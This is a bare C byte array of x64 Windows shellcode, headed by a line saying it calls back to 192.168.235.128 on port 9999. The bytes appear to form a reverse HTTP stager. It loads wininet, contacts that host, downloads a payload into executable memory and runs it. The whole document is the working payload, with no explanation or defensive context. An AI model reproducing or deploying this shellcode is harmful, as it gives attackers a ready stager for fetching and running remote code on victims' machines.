calling on 192.168.235.128 @ 9999

unsigned char buf[] = 
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x48\x31\xd2\x56\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x0f\xb7\x4a\x4a\x48\x8b\x72\x50"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b"
"\x42\x3c\x48\x01\xd0\x41\x51\x66\x81\x78\x18\x0b\x02\x0f"
"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
"\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x56\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88"
"\x48\x01\xd6\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1"
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x48\x31\xdb\x53\x49\xbe\x77\x69\x6e"
"\x69\x6e\x65\x74\x00\x41\x56\x48\x89\xe1\x49\xc7\xc2\x4c"
"\x77\x26\x07\xff\xd5\x53\x53\x48\x89\xe1\x53\x5a\x4d\x31"
"\xc0\x4d\x31\xc9\x53\x53\x49\xba\x3a\x56\x79\xa7\x00\x00"
"\x00\x00\xff\xd5\xe8\x10\x00\x00\x00\x31\x39\x32\x2e\x31"
"\x36\x38\x2e\x32\x33\x35\x2e\x31\x32\x38\x00\x5a\x48\x89"
"\xc1\x49\xc7\xc0\x0f\x27\x00\x00\x4d\x31\xc9\x53\x53\x6a"
"\x03\x53\x49\xba\x57\x89\x9f\xc6\x00\x00\x00\x00\xff\xd5"
"\xe8\xe5\x00\x00\x00\x2f\x6f\x52\x70\x6b\x39\x77\x56\x79"
"\x4c\x71\x78\x32\x49\x6e\x63\x67\x45\x69\x4d\x32\x6c\x77"
"\x76\x36\x56\x4d\x75\x76\x6a\x4b\x46\x55\x4e\x34\x62\x4a"
"\x5f\x62\x75\x5f\x6b\x37\x38\x72\x43\x31\x55\x62\x6b\x6b"
"\x32\x69\x67\x51\x4c\x6a\x46\x32\x68\x50\x55\x66\x33\x6c"
"\x2d\x34\x37\x70\x6b\x70\x5a\x6c\x71\x39\x44\x76\x59\x48"
"\x34\x52\x73\x5a\x34\x45\x34\x41\x4b\x61\x47\x31\x73\x47"
"\x63\x2d\x75\x69\x76\x68\x4a\x38\x4f\x38\x4d\x4f\x4c\x41"
"\x56\x54\x78\x6b\x34\x47\x54\x47\x4b\x54\x56\x53\x30\x67"
"\x63\x51\x31\x72\x71\x47\x6b\x78\x38\x57\x62\x43\x6c\x77"
"\x76\x41\x38\x31\x63\x79\x71\x66\x6a\x6f\x4f\x77\x74\x6a"
"\x55\x63\x54\x5f\x51\x59\x4e\x77\x76\x56\x2d\x65\x4e\x72"
"\x37\x4a\x71\x4b\x4c\x64\x51\x53\x66\x7a\x77\x57\x75\x64"
"\x66\x39\x59\x47\x39\x39\x53\x37\x57\x35\x57\x75\x64\x5f"
"\x63\x4f\x30\x4e\x43\x4a\x51\x5f\x38\x50\x62\x67\x6a\x32"
"\x77\x6d\x4a\x55\x4a\x77\x4d\x32\x6a\x51\x67\x58\x53\x6c"
"\x68\x6f\x79\x46\x49\x5f\x47\x4a\x6b\x00\x48\x89\xc1\x53"
"\x5a\x41\x58\x4d\x31\xc9\x53\x48\xb8\x00\x32\xa8\x84\x00"
"\x00\x00\x00\x50\x53\x53\x49\xc7\xc2\xeb\x55\x2e\x3b\xff"
"\xd5\x48\x89\xc6\x6a\x0a\x5f\x48\x89\xf1\x6a\x1f\x5a\x52"
"\x68\x80\x33\x00\x00\x49\x89\xe0\x6a\x04\x41\x59\x49\xba"
"\x75\x46\x9e\x86\x00\x00\x00\x00\xff\xd5\x4d\x31\xc0\x53"
"\x5a\x48\x89\xf1\x4d\x31\xc9\x4d\x31\xc9\x53\x53\x49\xc7"
"\xc2\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1f\x48\xc7\xc1"
"\x88\x13\x00\x00\x49\xba\x44\xf0\x35\xe0\x00\x00\x00\x00"
"\xff\xd5\x48\xff\xcf\x74\x02\xeb\xaa\xe8\x55\x00\x00\x00"
"\x53\x59\x6a\x40\x5a\x49\x89\xd1\xc1\xe2\x10\x49\xc7\xc0"
"\x00\x10\x00\x00\x49\xba\x58\xa4\x53\xe5\x00\x00\x00\x00"
"\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89"
"\xda\x49\xc7\xc0\x00\x20\x00\x00\x49\x89\xf9\x49\xba\x12"
"\x96\x89\xe2\x00\x00\x00\x00\xff\xd5\x48\x83\xc4\x20\x85"
"\xc0\x74\xb2\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd2\x58"
"\xc3\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";